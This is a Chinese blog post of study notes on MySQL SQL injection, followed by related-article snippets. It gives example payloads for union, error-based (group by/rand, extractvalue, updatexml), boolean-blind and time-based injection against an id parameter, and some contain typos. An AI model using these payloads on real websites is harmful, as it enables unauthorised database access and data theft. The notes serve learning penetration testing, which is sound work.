SQL注入-1

已于 2022-03-21 09:36:05 修改
阅读量3.8k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试漏洞学习 文章标签: 安全性测试
于 2022-03-19 21:24:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36567469/article/details/123585019

SQL注入-1

本次sql注入以mysql为例,整理的千锋网络视频的内容

1. 关系型数据库

有明显的层次结构库名|表名|字段名|字段内容
MySQL\ACCESS\mssql\oracle

2. SQL注入类别

  • 联合查询注入
  • 报错注入
  • 布尔盲注
  • 延时注入
  • 多语句查询注入

3. MySQL

3.1元数据数据库
  • information_schema
    • tables
      • table_name\tabel_schema
    • columns
      • column_name/table_name/schema_name
3.2 常用函数与参数
version()//mysql版本
database()
user()
current_user()
system_user()//系统用户名
@@datadir//数据库路径
@@version_compile_os//操作系统版本
length()
substring()
concat()
caoncat_ws()//有分隔符
group_concat()
rand()
sleep()
3.3 SQL注入点判断
3.3.1联合查询

联合查询:利用union select语句,会同时执行两条select语句,生成两张虚拟表。
联合查询必要条件

  1. 两张虚拟表有相同列数。
  2. 虚拟表对应列数的数据类型相同。

A union select B时,一般页面只显示A的内容,B的内容不显示,这时可在A后加入and 1=2等语句,将A的内容设为false,这种情况下就会在页面中显示B的内容。

联合查询时可用到hex(table_name)这个函数,为了避免引号影响,将文本转换为十六进制(数字格式);也可用到group_concat(table_name)这个函数,

3.3.2报错注入

group by注入
利用group by重复建冲突建报错

? id=33 union select 1,2,concat(left(rand(),3)'>',@@version,'>')as a,4,5,6 from information_schema.tables group by a--+

如果information_schema.tables等关键表被禁用,可用以下语句构造一个表

select 1 union select null union select !1

select concat(left(rand(),3),'>',select version(),'>')as x ,count(*) from (select 1 union select null union select !1)as x group by a--+

如果rand()和count()被禁用,可以用以下方式

select min(@a:=1) from (select 1 union select null union select !1)a group by concat('>',@@version,'>',@a=(@a+1)%2);

** SQL语句解析过程**

  1. from:from标识了这条语句要查的数据源,形成虚拟表VT1。
  2. where:对VT1过程中生成的临时表进行过滤,把满足where字句的列插到VT2
  3. group by:把VT2生成的表按照group by 中的列进行分组,形成VT3。
  4. having:对VT3进行过滤,满足条件的数据被加到VT4
  5. select:对select子句中的元素进行处理,形成VT5表(先计算表达式,再distinct之类)

** XPath报错注入**

  1. extracvalue():对xml文档进行查询的函数,语法为“extractvalue(目标xml文档,xml路径)”,正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
id?=33 and extracvalue(1,concat('>',(select version()),'<')--+`

注:extractvalue()能查询字符串的最大长度为32,如果想要的结果超过32,就需要用substring()函数截取,一次查看32位。
2. updatexml():更新xml文档的函数,语法为“updatexml(目标xml文档,xml路径,更新的内容)”,正常查询第二个参数的格式也应该是/xxx/xx/xx/xx,其他格式就会报错

?id=33 and updatexml(1,concat('>',select version(),'<'),1)--+
3.3.3布尔盲注
id=1 and ascii(substr(database(),1,1))>0
3.3.4延时注入

利用sleep()语句

?id=3 and if(length(database())=3,sleep(5),1)--+

MySQL注入基础及语句

《从0到1:CTFer成长之路》SQL注入-1
tr_trTTT的博客
04-07 4274
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境 题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。 网址存在id=1,可能存在注入点,手工一下看看是否存在。 先用 ' 试一下,返回了一个错误页面,说明存在sql注入,再用and 1=1 试一下,返回正确的页面,那我们再次试一下and 1=2,返回的是错误的页面; ...
sql注入--1初识sql注入
技术骨干小李的博客
07-13 697
sql注入的迅速了解
sql注入select/union select
@一只躺平的猪@的博客
07-14 3621
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select nullnull)、 判断回显位置
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 1万+
sql注入中的union联合查询,union select 1,2,3
MySQL SELECT语法(四)UNION语法详解
weixin_30745641的博客
06-01 363
  源自MySQL 5.7 官方手册:13.2.9.3UNION Syntax 一、UNION语法   UNION用于将多个SELECT语句的结果合并到一个结果集中。 SELECT ... UNION [ALL | DISTINCT] SELECT ... [UNION [ALL | DISTINCT] SELECT ...]   将会使用第一个SELECT语句中的列名...
select nullselect 1区别
码农界的小学生
06-29 2440
1Select n(数字) from table 得出一个行数和table表行数一样的临时列,每行的列值是我写在select后的数(n); 2、Select count(n) from table 得出一个数,该数是table表的行数; 3、Select sum(n) from table 得出一个数,该数是table表的行数×写在select后的数(n) ; Select nu
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
10-sql注入-mysql注入1
08-03
1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取...
初识sql注入--手工注入
banliyaoguai的博客
05-12 874
SQL注入攻击是一种常见的网络安全威胁,主要针对使用结构化查询语言(SQL)进行数据库操作的应用程序。通过利用应用程序对用户输入数据的不正确处理,攻击者可以在SQL查询中注入恶意代码,从而达到恶意目的。
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
变态方法突破过滤UNION+SELECT继续注入
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注射点:     //*ps 此点目前流行的注射工具射不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
关于如select 1 from **中的"1"。
辛いいか
12-20 2617
     在这里我主要讨论的有以下几个select 语句:table表是一个数据表,假设表的行数为10行,以下同。1select  1 from table      2:select count(1)  from table  3:select sum(1) from table对第一个select语句,我刚开始以为是“1”代表是列名,从2,3种顺推得出得结果:)有点无耻吧。不过通过我自己得观
深入理解SQL注入中的union select 1,2,3....
热门推荐
渗透之路,攻防之间皆学问
03-15 2万+
UNION 用于合并两个查询的结果集
SQL注入
jgmgtdp的博客
07-27 152
SQL注入 ?id= 35 +1/-1 select * from tbName where id=$id ?id= 35’ 字符型 或者是数字型 select * from tbName where id=35’ 报错信息有35就是字符型,没有35就是数字型 测试页面是否有布尔类型的状态 ?id=35 and 1=1 ?id=35 and 1=2 ?id=35 and sleep(5) 是否延迟 联合查询 union select语句 两条sel
SQL注入学习
qq_41007744的博客
05-01 754
字符串连接函数1. concat(str1,str2,...)连接参数产生的字符串。select concat(id,',',name) as con from info limit 1;2. group_concat(str1,str2,...)连接一个组所有的字符串,以逗号分割。3. concat_ws(separator,str1,str2,...)&lt;br&gt;含有分割符的连接字符串...
基于COMSOL的压裂井降压开采数值模拟:地层压力与流场分布研究
最新发布
08-18
利用COMSOL Multiphysics进行压裂井降压开采的数值模拟过程。首先,通过对特定油藏地区的岩层性质和流体分布进行初步勘测和分析,建立了三维地质模型,考虑了地层层次结构、岩石物理性质(如渗透率、孔隙度)和流体属性(如粘度、密度)。接着,在模型中设定了流体在多孔介质中流动的物理场,并配置了适当的流体源和压力边界条件。随后,使用流体流动和固体力学模块模拟了压裂过程,观察到裂缝的形成和扩展及其对周围地层的影响。最后,展示了模拟得到的地层压力和流场分布图,并附上了一段简化的COMSOL代码示例,解释了如何设置物理场和边界条件。通过这次模拟,不仅可以熟悉压裂开采的模拟方法,还能将其应用于油藏开采和地热开采等领域。 适合人群:从事能源开采领域的研究人员和技术人员,尤其是对压裂井降压开采感兴趣的从业者。 使用场景及目标:适用于希望深入了解压裂井降压开采过程的研究人员和技术人员,旨在提高对地下流体运动和压力变化的理解,优化开采过程。 其他说明:文中提供的代码示例有助于读者快速入门COMSOL的流体流动仿真设置,同时模拟结果为实际开采提供了宝贵的数据支持。
工业自动化领域汇川中大型PLC(AM600AM400AC800)模版的模块化编程及其应用
08-18
内容概要:本文介绍了汇川中大型PLC模版(AM600、AM400、AC800)的特点和优势,重点阐述了模块化编程方法的应用。文中提到,这些模版不仅结构清晰、稳定可靠,而且易于扩展和维护。此外,文章还提供了一个新能源项目的PLC程序实例,展示了如何利用指针和for循环遍历的方式简化多轴控制系统的设计。同时,文中附带了空模版和实际案例模版,便于初学者和从业者快速上手并应用于实际项目中。 适合人群:从事工业自动化领域的工程师和技术人员,特别是那些希望提高PLC编程技能或者正在寻找高效编程解决方案的专业人士。 使用场景及目标:①学习和掌握汇川中大型PLC模版的模块化编程技巧;②通过实际案例加深对多轴控制系统的理解;③利用提供的模版加速新项目的开发进程。 其他说明:文中提供的程序实例和模版有助于读者更好地理解和实践PLC编程,但需要注意的是,软件一旦售出不可退换。
前端分析-2023071100789s
08-18
前端分析-2023071100789s
[第一章 web入门]sql注入-1
06-28
### 回答1SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码。 SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值